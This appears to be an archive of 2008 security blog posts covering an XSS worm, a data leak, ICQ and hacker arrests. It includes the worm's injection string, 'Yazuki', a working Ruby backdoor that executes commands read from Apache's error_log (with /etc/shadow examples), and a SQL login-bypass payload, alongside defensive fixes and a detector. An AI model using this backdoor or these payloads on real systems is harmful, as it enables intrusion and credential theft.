Justin.tv hit by XSS Worm

Another XSS worm has come to life. This time the video and chat community [justin.tv] has been hit by an XSS worm which, once again, was non-malicious and only a proof of concept. The worm was written and released by the authors of the website [www.thedefaced.org]. The original news I read can be found on [xssed.com]. x2Fusion from TheDefaced has stated the following concerning the worm:
This actually is the very first XSS worm which we have unleashed, and it was solely for research reasons; non-malicious at all :) We contacted the JTV programmers prior to the fixing of the XSS worm and sorted things out with them, and made sure that they knew NO information such as IP addresses, cookies, sessions or further information which is private was to be released. After that I put myself forward and found another XSS in order to prove that I was dedicated to helping JTV out with any further possible vulnerabilities.
The worm was made possible by missing sanitization of the "Location" field in the user profile: whatever a user typed there was stored and rendered unescaped into every page that showed the profile, so arbitrary HTML and JavaScript could be injected. The authors used the following to inject the worm's code:
<iframe id='tframeid' width=0 height=0 frameborder=0></iframe> <script src="justinworm.js" language="javascript"></script>"
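To make the point concrete, here is an added example (not justin.tv's code and not part of the original post) of the two things that were missing: the vulnerable rendering of a profile field next to a version that validates the field on input and escapes it on output. The payload is the one from the post; the allowlist pattern for a "location" is an assumption for the example.

```ruby
require "cgi"

# The injection string from the post, stored in a profile's Location field.
WORM_PAYLOAD = %q{<iframe id='tframeid' width=0 height=0 frameborder=0></iframe> <script src="justinworm.js" language="javascript"></script>}

# Vulnerable: stored user data is interpolated straight into markup, so the
# browser of every visitor executes whatever the profile owner (or a worm)
# put there.
def render_location_unsafe(location)
  "<div class=\"location\">#{location}</div>"
end

# Hardened, step 1: only accept what a location can plausibly look like
# (letters, digits, blanks, a little punctuation, bounded length).
# The exact allowlist is an assumption for this example.
LOCATION_RE = /\A[[:alpha:][:digit:] ,.'\-]{1,64}\z/

def valid_location?(location)
  LOCATION_RE.match?(location)
end

# Hardened, step 2: escape on output no matter what was stored, so a value
# that slipped past validation (or was written by older code) cannot break
# out of the text context. CGI.escapeHTML turns < > & " ' into entities.
def render_location_safe(location)
  "<div class=\"location\">#{CGI.escapeHTML(location)}</div>"
end

if __FILE__ == $PROGRAM_NAME
  puts "input accepted? #{valid_location?(WORM_PAYLOAD)}"
  puts render_location_unsafe(WORM_PAYLOAD)
  puts render_location_safe(WORM_PAYLOAD)
end
```

Validation and output escaping are independent layers: the allowlist rejects the worm before it is stored, and the escaping makes already-stored data harmless in the HTML context it is rendered into.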
The authors of xssed.com have made a graphic (PNG) showing the development of the worm in the network of justin.tv, look [here].
The worm's source code can be found on [worms.xssing.com/sources/justintv.txt]. It is open to everyone because the authors wrote it for educational purposes only. The vulnerability has since been fixed, to be precise on Sun, 29 Jun 2008 21:12:21 GMT.
What to say? Well, once again an XSS worm has seen the light of day, compromising 2525 profiles in total, and again it was NOT malicious. XSS worms are still very young on the web and there are about a dozen around, all publicly available to learn from, BUT, and this is the problem: I guess it won't take very long until the first malicious people enter the game and use the knowledge the good guys have to do "bad" stuff. The potential is immense. Just imagine a malicious XSS worm that manipulates a user's profile and embeds a manipulated SWF file into it, which automatically attacks the browser of every visitor to execute arbitrary commands on the victim's machine and install malware, for botnets, for spam, for whatever might be interesting. The time will come; if website administrators don't learn it NOW they will soon learn it the hard way. There is still time to learn it the soft way, with the help of people like x2Fusion who do ethical hacking, but it won't stay like this forever!
Wired-Security readers know first
Reading my emails this morning I also received one from a friend of mine (Marko Rogge), which pointed me to a Heisec news entry. The news entry can be found [here] and is titled "MSN-Phishing und Link-Spam greift um sich", which translates to something like "MSN phishing and link spam are spreading". This entry was made on the 7th of July or, in other words: yesterday. Readers of Wired-Security have known about this problem for a month; check the archive for the [news].
Furthermore the Heise entry is not very informative; it does not say a lot about the whole problem, nothing about the website, the hosting provider etc. And there is one specific point missing: the problem is not only a problem of MSN, the phishers' website also includes a login field for ICQ. All of that is missing in the Heise entry.
What shall I say? I am quite angry about this news because I informed Heise in an email ONE MONTH ago, and I can prove this, and they totally ignored my email, and NOW, after one month, they write about it as if THEY found it out. This is not only unprofessional, it left users uninformed and at risk for over 30 days!
To prove I am not lying, here is the source of the email I sent to them:
MIME-Version: 1.0
Date: Wed, 4 Jun 2008 22:31:25 +0200
From: <skyout@wired-security.net>
To: red@heisec.de
Subject: MSN/ICQ Phishing
Message-ID: <61a07e03c1e1286dd80dd97b20947d7e@s2.nexpaserver.de>
X-Sender: skyout@wired-security.net
User-Agent: RoundCube Webmail
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit

http://wired-security.net/archive/2008/june/index.php#04_2_062008

Please look closer at this and maybe blog about it. If you do so, please be so fair to link back to my blog. Thanks. SkyOut.
Look at the date: 4th of JUNE! So instead of being fair, blogging about it and linking back to my blog, they ignored it and make their users believe they found something new one month after my readers knew about it. This is unprofessional and awkward!
Conclusion: Next time I won't inform Heise anymore. Let them be uninformed if they can not even credit those, who informed them.
Apache error_log Backdoors (DE)

It's been quite a while since I posted my last Hakin9 article here, but now it is time for a new one. I planned to release it much earlier, so sorry for the delay. The article is called "Apache error_log Backdoors" and was published in Hakin9 2/2008 (March).
The idea of the article is the following: every time a client requests a path from an Apache webserver that does not exist, Apache writes a "File does not exist" entry for that request to its error_log file, which on OpenBSD lives in /var/www/logs/error_log (most Linux systems put it under /var/log/httpd or /var/log/apache2 instead). We use this to smuggle in shell commands, which then get executed, without the backdoor ever listening on a port of its own. I have written a proof-of-concept called Yazuki in Ruby that demonstrates a simple backdoor of this kind, look here:
#!/usr/bin/env ruby
# Name: Yazuki
# Author: SkyOut
# Date: October 2007
# Website: http://wired-security.net/
# Used Ruby Version: 1.8.4
# Tested on: OpenBSD 4.1
#
# This Proof-of-Concept code shows a simple backdoor concept that does
# not need any open port to execute shell commands. Yazuki searches the
# error_log file of Apache every 5 seconds for a specified password and
# executes the command that follows it. The command may have up to five
# whitespace-separated words (for more, extend the fetch() chain below).
#
# Possible commands (make sure to always send exactly five words,
# or edit the fetch() chain below):
#   less /etc/passwd > /var/www/htdocs/pw.txt ;
#   ls -a /home > /var/www/htdocs/home.txt

# Define the error_log file of Apache (OpenBSD default location)
error_log = "/var/www/logs/error_log"

# Start an indefinite loop
loop do
  found = false
  # Open Apache's error_log file; the block form closes it again
  if File.file?(error_log) && File.readable?(error_log)
    File.open(error_log) do |f|
      f.each_line do |line|
        # Define the password
        next unless line =~ /password/
        # Make an array of the error_log line
        array = line.split(" ")
        # A line that matched the password but is too short would make
        # fetch() raise IndexError and kill the loop, so skip it
        next if array.length < 18
        # Take the 5 last arguments
        command = array.fetch(13) + " " + \
          array.fetch(14) + " " + array.fetch(15) \
          + " " + array.fetch(16) + " " + array.fetch(17)
        # Execute the command and wait for it to finish
        IO.popen(command) { |io| io.read }
        found = true
      end
    end
    # Truncate the error_log file again so the command is not run twice
    if found && File.writable?(error_log)
      File.truncate(error_log, 0)
    end
  end
  # Wait 5 seconds
  sleep 5
end
How does this code work? Well, it is very simple. We define a password (for example "password"; you should choose something better, of course) and then we send a request to the server like this:
GET /password [our shell commands go here] HTTP/1.1
Host: www.example.com
[newline]
[newline]
So, let's say we have installed our backdoor as root, then we could for example send the following command to the webserver:
GET /password cat /etc/shadow > /var/www/htdocs/shadow ; HTTP/1.1
Host: www.example.com
[newline]
[newline]
Now of course this file does not exist, so Apache writes an error to error_log. Our backdoor reads that file every 5 seconds, and if it finds a line containing our password it takes the five words after the bogus filename, puts them together and hands them to the shell. In the code these are the following lines:
if line =~ /password/
array = line.split(" ");
command = array.fetch(13) + " " + \
array.fetch(14) + " " + array.fetch(15) \
+ " " + array.fetch(16) + " " + array.fetch(17)
IO.popen("#{command}")
After that the file gets truncated again, and we can now read the shadow file by requesting it from the webserver as follows:
GET /shadow HTTP/1.1
Host: www.example.com
[newline]
[newline]
One practical note: the server splits the request line at whitespace, so on the wire the spaces in the command have to be percent-encoded (%20) to keep the whole command inside the one requested path. Apache decodes the path before it writes the "File does not exist: ..." entry, so the error_log line still contains the plain command words that the backdoor splits on.
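The flip side for an administrator is that this backdoor leaves a very recognisable trace: "File does not exist" entries whose "path" contains blanks and shell metacharacters. The following is an added example (not from the Hakin9 article and not part of Yazuki) that scans error_log text for exactly that footprint and groups hits per client. The sample log lines are constructed for the example in the Apache 1.3/2.x error_log format; they are not a real capture.

```ruby
# Constructed sample of Apache error_log lines (not a real log).
SAMPLE_LOG = <<~LOG
  [Sun Jun 29 21:10:05 2008] [error] [client 192.0.2.10] File does not exist: /var/www/htdocs/favicon.ico
  [Sun Jun 29 21:12:21 2008] [error] [client 198.51.100.7] File does not exist: /var/www/htdocs/password cat /etc/shadow > /var/www/htdocs/shadow ;
  [Sun Jun 29 21:12:30 2008] [error] [client 192.0.2.10] File does not exist: /var/www/htdocs/robots.txt
  [Sun Jun 29 21:15:02 2008] [error] [client 198.51.100.7] File does not exist: /var/www/htdocs/p4ss ls -a /home > /var/www/htdocs/home.txt ;
  [Sun Jun 29 21:16:00 2008] [notice] caught SIGTERM, shutting down
LOG

# One "File does not exist" entry: timestamp, level, client address, path.
ENTRY_RE = /\A\[(?<stamp>[^\]]+)\] \[(?<level>[^\]]+)\] \[client (?<client>[^\]]+)\] File does not exist: (?<path>.+)\z/

# Characters that never belong in a requested filesystem path but are
# needed to build a shell command line (blanks, ; | & > < ` $).
SHELL_META = /[\s;|&><`$]/

# Returns an array of hashes, one per suspicious entry.
def scan_error_log(text)
  findings = []
  text.each_line do |raw|
    line = raw.chomp
    m = ENTRY_RE.match(line)
    next unless m                          # notices, startup lines, etc.
    next unless SHELL_META.match?(m[:path])
    findings << {
      stamp:   m[:stamp],
      client:  m[:client],
      path:    m[:path],
      # Yazuki takes the words after the bogus filename as the command
      command: m[:path].split(/\s+/, 2)[1],
    }
  end
  findings
end

# Counts suspicious entries per client so a single noisy source stands out.
def suspicious_clients(text)
  scan_error_log(text).each_with_object(Hash.new(0)) { |f, h| h[f[:client]] += 1 }
end

if __FILE__ == $PROGRAM_NAME
  scan_error_log(SAMPLE_LOG).each do |f|
    puts "#{f[:stamp]}  #{f[:client]}  -> #{f[:command]}"
  end
  p suspicious_clients(SAMPLE_LOG)
end
```

On a real system you would feed the live file (or its rotated copies) through this, and a sudden run of 404 entries from one client whose paths contain blanks is worth a look even without a backdoor in mind: legitimate clients do not request paths like that.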
The whole article printed in Hakin9 can be found [here] (Texts -> Attack).
The Proof-of-Concept code can be found [here] (Releases -> Hacking/Cracking).
HTTP GET Request in C (Win32)
I am currently developing a program that uses a GET request to fetch data from a website. The first basic steps are done, thanks to the help of WildCat. If you want to look at these first steps, here we go. The headers and globals (winsock2.h has to come before windows.h, otherwise the old winsock.h gets pulled in and the declarations clash):
#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")

/* windows.h already defines MAX_PATH (260), so that name is not reused here */
#define PORT 80

SOCKET sock;
SOCKADDR_IN remote_addr;
Then we have a function to set the host. It accepts either a dotted IP address or a hostname (it could also be turned into a function that returns the IP of a hostname, see the lines commented out):
//u_long getip(const char *host)
void sethost(const char *host)
{
    struct hostent *hp;
    u_long host_ip;

    memset(&remote_addr, 0, sizeof(SOCKADDR_IN));
    remote_addr.sin_family = AF_INET;
    remote_addr.sin_port = htons(PORT);

    host_ip = inet_addr(host);
    if (host_ip != INADDR_NONE)
    {
        /* a literal IP address: no lookup needed */
        remote_addr.sin_addr.s_addr = host_ip;
        return;
    }
    /* a hostname: resolve it; on failure remote_addr stays zeroed
       and the connect() in main() fails */
    if ((hp = gethostbyname(host)) != NULL)
    {
        //host_ip = *(u_long *)hp->h_addr_list[0];
        memcpy(&remote_addr.sin_addr, hp->h_addr_list[0], hp->h_length);
    }
    //return host_ip;
}
And finally the main() function to send the GET request. recv() neither NUL-terminates the buffer nor guarantees the whole reply in one call, so the answer is read in a loop until the server closes the connection (which HTTP/1.0 servers do after the response):
int main(void)
{
    WSADATA wsaData;
    char buffer[512];
    char recvbuff[512];
    int res;

    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
    {
        fprintf(stderr, "WSAStartup failed\n");
        return 1;
    }
    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET)
    {
        fprintf(stderr, "socket() failed: %d\n", WSAGetLastError());
        WSACleanup();
        return 1;
    }
    sethost("www.example.com");
    if (connect(sock, (SOCKADDR*)&remote_addr, sizeof(remote_addr)) == SOCKET_ERROR)
    {
        fprintf(stderr, "connect() failed: %d\n", WSAGetLastError());
        closesocket(sock);
        WSACleanup();
        return 1;
    }
    /* bounded formatting; a long host name must not overflow the buffer */
    _snprintf(buffer, sizeof(buffer) - 1, "GET / HTTP/1.0\r\nHost: www.example.com\r\n\r\n");
    buffer[sizeof(buffer) - 1] = '\0';
    if (send(sock, buffer, (int)strlen(buffer), 0) == SOCKET_ERROR)
    {
        fprintf(stderr, "send() failed: %d\n", WSAGetLastError());
        closesocket(sock);
        WSACleanup();
        return 1;
    }
    /* leave one byte for the terminating NUL */
    while ((res = recv(sock, recvbuff, sizeof(recvbuff) - 1, 0)) > 0)
    {
        recvbuff[res] = '\0';
        // do stuff here ...
        fputs(recvbuff, stdout);
    }
    closesocket(sock);
    WSACleanup();
    return 0;
}
I will blog a bit more about this in the future as it progresses!
Data of 41000 citizens in the net

The Chaos Computer Club published a news item about a big data leak on the website of the market research institute TNS Infratest/Emnid. It was possible to obtain information about 41000 (maybe more) citizens who had worked with the institute. The problem was as simple as it was shocking and stupid. The URL of the site looked like the following: www.report-global.com/mimitacon/[some stuff]/pages/business/masterdata.aspx?fromWhere=base&id=11XXXX. When you logged in with a working account you at first only saw the details of that specific account, but by simply changing the "id" parameter it was possible to see the profiles of other citizens, because the server never checked whether the requested id belonged to the logged-in account. With a simple Python script the CCC was able to fetch about 41000 data sets.
What is really shocking is how detailed those records were. Your email address was in there, your date of birth, your phone number. Furthermore very sensitive data could be seen, like your income, your job, your health insurance, your bank details, the credit cards you used and much more...
How was the CCC able to get at this information, did they hack into it? No, not really... They received a mail with a valid account and looked closer at the website. That simple, that shocking.
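The pattern here is a record fetched by a client-supplied id with no ownership check. The following is an added example (not TNS Infratest's code and not the CCC's script) showing that lookup next to one scoped to the logged-in account, and the id-walking the CCC did run against both. The records, ids and account names are constructed for the example.

```ruby
# Constructed "masterdata" table: id => record (dummy values, not real data).
MASTERDATA = {
  110001 => { owner: "alice", name: "Alice A.", iban: "(dummy)" },
  110002 => { owner: "bob",   name: "Bob B.",   iban: "(dummy)" },
  110003 => { owner: "carol", name: "Carol C.", iban: "(dummy)" },
}

class Forbidden < StandardError; end

# Vulnerable: any authenticated session can read any id. The session user is
# accepted as a parameter but never consulted.
def masterdata_unsafe(session_user, id)
  MASTERDATA[id]
end

# Fixed: the record is only returned if it belongs to the session's account
# (or the caller is an explicit admin). Unknown and foreign ids get the same
# answer, so the endpoint cannot be used to find out which ids exist.
def masterdata_safe(session_user, id, admin: false)
  record = MASTERDATA[id]
  unless record && (admin || record[:owner] == session_user)
    raise Forbidden, "id #{id} is not available to #{session_user}"
  end
  record
end

# What the CCC script did: walk the id space with one valid login.
# Returns id => owner for every record the fetcher handed out.
def enumerate(session_user, ids, fetcher)
  ids.each_with_object({}) do |id, seen|
    begin
      r = fetcher.call(session_user, id)
      seen[id] = r[:owner] if r
    rescue Forbidden
      # denied: nothing leaked for this id
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  p enumerate("alice", 110000..110004, method(:masterdata_unsafe))
  p enumerate("alice", 110000..110004, method(:masterdata_safe))
end
```

The fix is not to hide the id (a sequential id is fine as long as it is not the only thing standing between a user and the data); it is to tie every lookup to the authenticated account on the server side.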
The original article at [www.ccc.de].
All your data are belong to us

Not being in the best mood anyway, I just came across a news item on the blog of wired.com which really shocked me: all YouTube logs have to be handed over to a company called Viacom. The logs amount to 4 terabytes, including user names and IP addresses, all the videos they have watched and everything they did on the YouTube website. Viacom filed suit against Google in March 2007 for allowing users to upload copyrighted material to YouTube and claims damages of 1 billion USD. Now Google is forced to hand over ALL its logs to Viacom, who want to prove with them that people watch more copyrighted material than free material.
Viacom wanted even more: a copy of every video marked as private, and more. This has been denied, but nevertheless the story is quite shocking to me. What is all this going to become in future? The whole concept of Web 2.0 seems at risk when companies can force websites to shut down whenever they feel that copyright laws are broken. This case is a perfect example, and it is even worse that Viacom now has the right to get the logs, decided by a court on Wednesday.
Where is all this going? Will all those great projects be forced down by companies? That would be very bad, as it would turn the internet into something other than what it is now.
Original post: [blog.wired.com].
CFP for 25c3 opened now

The Call for Participation/Papers for the annual congress of the Chaos Computer Club has opened its gates. You can now submit the ideas you would like to give a talk or a workshop about, or whatever else. The topics are, as always: Hacking, Making, Science, Society, Culture and Community. From the page of the Chaos Computer Club:
Criteria by which we assess a lecture
* we consider the topic in general relevant for the participants
* we consider the topic currently relevant for the participants
* we consider the topic interesting, fun and worthy to be known more about
* the lecture is about something the speaker made himself
* we think the lecture might be fun
* the lecture is part of a workshop (has a second part which is a workshop)
* the lecture presents something new
* the more information provided about the lecture and the speaker the better
The following "Dates and Deadlines" have been set:
* October 5th, 2008 (Midnight UTC): Submission due
* November 7th, 2008 (Midnight UTC): Final notification of acceptance (or earlier)
* November 28th, 2008 (Midnight UTC): Final papers due
* December 27th - 30th, 2008: Chaos Communication Congress
To submit something go to [cccv.pentabarf.org/submission/25C3].
The "Jonny Hell" case
It's been quite a while since a top story about a hacker found its way into the media, but now it has happened again. Talking to my father, he told me that he had read a story in the newspaper about a guy called Aleksandr Suvorov, better known on the internet as "Jonny Hell", who was caught at Frankfurt (Main) International Airport by US Secret Service agents and taken to prison. I read it on the internet as well, coming across it on "Spiegel Online". The story is very interesting for several reasons.
First of all it has to be said that some newspapers call Aleksandr Suvorov the most wanted hacker worldwide (which is typical for the media, to make it more shocking, *no comment*), and for sure he is a big fish that they got, no question. "Spiegel Online" talks of millions of stolen credit cards that caused damage of more than 100 million USD to people and companies. Some other newspapers talk of only a few million. All in all the story is not totally clear; the media hype is immense. For example the "hack" of a cafe in the state of New York gave the hackers access to 5000 credit card numbers. But look closer:
Jonny Hell is not a case like every other one. Many things are unclear, and the way his seizure happened is against the law! That has to be stated. Secret Service agents have NO right to arrest a person on German ground and take him to prison. Furthermore the arrest warrant for installing a trojan (packet sniffer) on the restaurant's computer was issued on the 12th of March this year, one week AFTER the seizure. What is also interesting is HOW LONG it takes until such a story reaches the public newspapers. It takes months until people are informed about what happened.
Let me make a cut in the story of "Jonny Hell" here and turn around. Is this really a rare case? Did this only happen to him, and because he is SO DANGEROUS? Or can it happen to every little fish out there, evil or not, guilty or not? The answer is simple: it can happen to everyone, and it did. If you are part of the German hacker community you should know it; if not, I will tell you. A person known under the handle Rembrandt was picked up in a similar but much rougher way on the 22nd of March 2007 in a restaurant in Berlin by agents who did not even say who they were or what they wanted. They took him with them in a car and brought him to a place he did not know, with no chance to find out where he was. He had to sign a statement to be released, and they told him that if he did not sign it they could keep him for days or longer. They wanted to scare him and make him admit that he had hacked into the network of Deutsche Bank for more than half a year. Even until today there has been no official charge against him, but the consequences of having your apartment raided, being kept in a prison without the right to call a lawyer and more are worse than a charge could be. Your chances of getting a well-paid job in the security industry are almost zero.
Think about it: do you still think democracy works? Do you think it is more than a word written on paper? If yes, why can it happen that people get arrested by agents who have no right to do so and face no consequences for it? Why can it happen that people are forced to sign a statement without speaking to a lawyer, without knowing what is actually going on, without PROOF!? ... Take a moment, think about it.
Why ICQ sucks

I was at work today, chatting with some friends on ICQ. Around 6 pm I went home and wanted to log in to my account again, which resulted in an error message from Pidgin. My instant messenger could not log in to ICQ anymore, but instead gave me the message "Your version is not up-to-date to work with ICQ, go to http://pidgin.im/". I guess millions have seen this message, and the site was no longer reachable, effectively a DDoS, whatever. To make Pidgin work again you would have to change a value in the header file oscar.h from 0x010a to 0x010b and recompile the whole program. For Linux users this might work out, but for Windows it is really annoying. So why does ICQ do this? Simple answer: they want to force people to upgrade to ICQ 6, their new and "cooler" version of the client. If you watch the whole thing with Wireshark while connecting you will see something like this (tip: look for the *.exe, that is what they want you to download and install). The server answers the login with a FLAP frame on channel 4 (close connection) whose TLVs carry an error code and the download URL:
Frame 35 (669 bytes on wire, 669 bytes captured)
Ethernet II, Src: ZonetTec_e1:57:32 (00:50:22:e1:57:32), \
Dst: *:*:* (*:*:*:*:*:*)
Internet Protocol, Src: 64.12.161.153 (64.12.161.153), \
Dst: *.*.*.* (*.*.*.*)
Version: 4
Header length: 20 bytes
Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
Total Length: 655
Identification: 0x8aa2 (35490)
Flags: 0x04 (Don't Fragment)
Fragment offset: 0
Time to live: 105
Protocol: TCP (0x06)
Header checksum: 0xb325 [correct]
Source: 64.12.161.153 (64.12.161.153)
Destination: *.*.*.* (*.*.*.*)
Transmission Control Protocol, Src Port: aol (5190), \
Dst Port: 11234 (11234), Seq: 11, Ack: 102, Len: 615
Source port: aol (5190)
Destination port: 11234 (11234)
Sequence number: 11 (relative sequence number)
[Next sequence number: 626 (relative sequence number)]
Acknowledgement number: 102 (relative ack number)
Header length: 20 bytes
Flags: 0x18 (PSH, ACK)
Window size: 16384
Checksum: 0x7577 [correct]
[Good Checksum: True]
[Bad Checksum: False]
[SEQ/ACK analysis]
[PDU Size: 615]
AOL Instant Messenger
Command Start: 0x2a
Channel ID: Close Connection (0x04)
Sequence Number: 26668
Data Field Length: 609
TLV: Unknown
Value ID: Unknown (0x008e)
Length: 1
Value
TLV: Screen name
Value ID: Screen name (0x0001)
Length: 9
Value: 410996901
TLV: BOS server string
Value ID: BOS server string (0x0005)
Length: 17
Value: 64.12.25.112:5190
TLV: Authorization cookie
Value ID: Authorization cookie (0x0006)
Length: 256
Value
TLV: Error Code
Value ID: Error Code (0x0008)
Length: 2
Value: 28
TLV: Error URL
Value ID: Error URL (0x0004)
Length: 46
Value: http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe
TLV: Latest Beta Build
Value ID: Latest Beta Build (0x0040)
Length: 4
Value: 11
TLV: Latest Beta Name
Value ID: Latest Beta Name (0x0043)
Length: 9
Value: 5.33.3000
TLV: Latest Beta URL
Value ID: Latest Beta URL (0x0041)
Length: 46
Value: http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe
TLV: Latest Beta Info
Value ID: Latest Beta Info (0x0042)
Length: 52
Value: http://download.icq.com/download/icq6/whats_new.html
TLV: Latest Release Build
Value ID: Latest Release Build (0x0044)
Length: 4
Value: 11
TLV: Latest Release Name
Value ID: Latest Release Name (0x0047)
Length: 9
Value: 5.33.3000
TLV: Latest Release URL
Value ID: Latest Release URL (0x0045)
Length: 46
Value: http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe
TLV: Latest Release Info
Value ID: Latest Release Info (0x0046)
Length: 52
Value: http://download.icq.com/download/icq6/whats_new.html
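To see the mechanism without Wireshark, here is an added example (not Pidgin's or ICQ's code, and not part of the original post) of a small decoder for the FLAP frame format shown in the dump: a 6-byte header (0x2a, channel, 16-bit sequence number, 16-bit data length) followed by TLVs (16-bit type, 16-bit length, value), all big-endian. The frame below is constructed from the TLVs in the capture; it is not the captured bytes, and the TLV-type names are the ones Wireshark's dissector used.

```ruby
# Builds one TLV: 16-bit type, 16-bit length, value (big-endian).
def tlv(type, value)
  [type, value.bytesize].pack("nn") + value
end

# Builds one FLAP frame around a data payload.
def build_flap(channel, seq, data)
  [0x2a, channel, seq, data.bytesize].pack("CCnn") + data
end

# Constructed frame modelled on the capture: channel 4 with screen name,
# error code 28, the ICQ6 installer URL and the "latest release" name.
SAMPLE_FRAME = build_flap(4, 26668,
  tlv(0x0001, "410996901") +
  tlv(0x0008, [28].pack("n")) +
  tlv(0x0004, "http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe") +
  tlv(0x0047, "5.33.3000"))

FLAP_CHANNELS = {
  1 => "new connection", 2 => "SNAC data", 3 => "error",
  4 => "close connection", 5 => "keep-alive",
}

# Parses one FLAP frame into its header fields and a list of [type, value].
# Length fields are checked against what is actually present, so a
# truncated or lying frame raises instead of reading past the buffer.
def parse_flap(bytes)
  raise ArgumentError, "not a FLAP frame" unless bytes.getbyte(0) == 0x2a
  _, channel, seq, len = bytes.unpack("CCnn")
  data = bytes.byteslice(6, len)
  raise ArgumentError, "truncated frame" if data.nil? || data.bytesize < len
  tlvs = []
  off = 0
  while off + 4 <= data.bytesize
    type, vlen = data.byteslice(off, 4).unpack("nn")
    value = data.byteslice(off + 4, vlen)
    raise ArgumentError, "truncated TLV 0x%04x" % type if value.nil? || value.bytesize < vlen
    tlvs << [type, value]
    off += 4 + vlen
  end
  { channel: channel, channel_name: FLAP_CHANNELS.fetch(channel, "unknown"),
    seq: seq, tlvs: tlvs }
end

# Pulls the fields of interest out of a channel-4 frame, as the dissector did.
def describe_close(frame)
  t = frame[:tlvs].to_h
  {
    screen_name:    t[0x0001],
    error_code:     t[0x0008] && t[0x0008].unpack1("n"),
    error_url:      t[0x0004],
    latest_release: t[0x0047],
  }
end

if __FILE__ == $PROGRAM_NAME
  frame = parse_flap(SAMPLE_FRAME)
  puts "channel #{frame[:channel]} (#{frame[:channel_name]}), seq #{frame[:seq]}"
  p describe_close(frame)
end
```

The point a client author takes from this: the decision to refuse the login is entirely server-side and is signalled by a single error code, which is why the only client-side "fix" was to report a different version number.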
Code Injection? (2)
Last month I wrote about a possible code injection in a PHP file, which, as I found out with the help of another person, does not occur. That person then suggested that a stacked query could work to inject SQL commands, but that did not work either, because mysql_query() does not allow stacked queries. All of this you can find in the [archive]. So why do I write about it again? Because there is a way to inject SQL and bypass the login after all! Let's look at it again. This is the script:
[...]
$anmeldename=$_POST['anmeldename'];
$passwort=$_POST['passwort'];
$sql="SELECT * FROM `member` WHERE `Anmeldename`='$anmeldename'";
$erg=mysql_query($sql);
$zeile = mysql_fetch_object($erg);
$spw=md5($passwort);
if($zeile->Passwort==$spw)
[...]
So how can we bypass this script? Let's assume that the table "member" has two columns, "Anmeldename" and "Passwort" (the UNION below has to produce exactly as many columns as SELECT * returns). So the table looks like this:
+-------------+----------------------------------+
| Anmeldename | Passwort                         |
+-------------+----------------------------------+
| admin       | unknown to us                    |
+-------------+----------------------------------+
Now, the interesting part is the last two lines. The POSTed password gets hashed with MD5 and saved to $spw. Then the first row returned by mysql_fetch_object() is read, its "Passwort" field is compared to that MD5 hash, and nothing checks where that row came from. Okay, enough talk, here is the injection:
Anmeldename: x' LIMIT 0 UNION ALL SELECT 'admin', '9990775155c3518a0d7917f7780b24aa
Passwort: ttt
What happens here? If the injection works, the query will finally look like this: "SELECT * FROM `member` WHERE `Anmeldename`='x' LIMIT 0 UNION ALL SELECT 'admin','9990775155c3518a0d7917f7780b24aa'" (the closing quote comes from the original query). The LIMIT 0 only makes sure the first SELECT contributes no rows; since no user named "x" exists, it returns none anyway, so the injection works without it on servers that refuse a LIMIT in the first branch of a UNION. Either way the result is a table looking like this:
+-------------+----------------------------------+
| Anmeldename | Passwort                         |
+-------------+----------------------------------+
| admin       | 9990775155c3518a0d7917f7780b24aa |
+-------------+----------------------------------+
And now we give the password "ttt" to the script, whose MD5 hash is "9990775155c3518a0d7917f7780b24aa"! So finally "if($zeile->Passwort==$spw)" becomes "if(9990775155c3518a0d7917f7780b24aa==9990775155c3518a0d7917f7780b24aa)", which is TRUE, and that results in? Guess? Yep, you are logged in! The root cause is that $anmeldename is pasted into the SQL text; the fix is to pass it as a bound parameter of a prepared statement (mysqli or PDO) so the database never sees it as part of the query.
Thanks go to [WildCat], who has tested this for me and can say for sure, that it works under PHP 5 plus MySQL 5!
UPDATE: Once again I have to update this news (it seems they never want to end). Veda messaged me again and told me it would work as a code injection if you use backticks. As a proof of concept he opened the PHP interpreter on his local machine and did the following:
% php -a
php > print md5();
Warning: md5() expects at least 1 parameter, 0 given in php shell code on line 1
php > print md5(x);
9dd4e461268c8034f5c8564e155c67a6
php > print md5(`mkdir foo`);
[...]
% ls
foo
No comment from my side! I hope that's it! EOF!
UPDATE 2: So, another update... I won't comment on this anymore, look for yourself (backticks in the PHP source are executed by the interpreter; backticks inside a string that arrives as data are just characters, which is what the last two lines show):
joern@heaven:~$ cat test.php
<?
$string = "`touch skyout-win`";
echo md5(x)."\n";
echo md5('')."\n";
echo md5(`touch skyout-fail`)."\n";;
echo md5($string)."\n";;
?>
joern@heaven:~$ php test.php
9dd4e461268c8034f5c8564e155c67a6
d41d8cd98f00b204e9800998ecf8427e
d41d8cd98f00b204e9800998ecf8427e
70f42a7d8d215d0c5f0078b58ca5730f
joern@heaven:~$ ls skyout*
skyout-fail
joern@heaven:~$

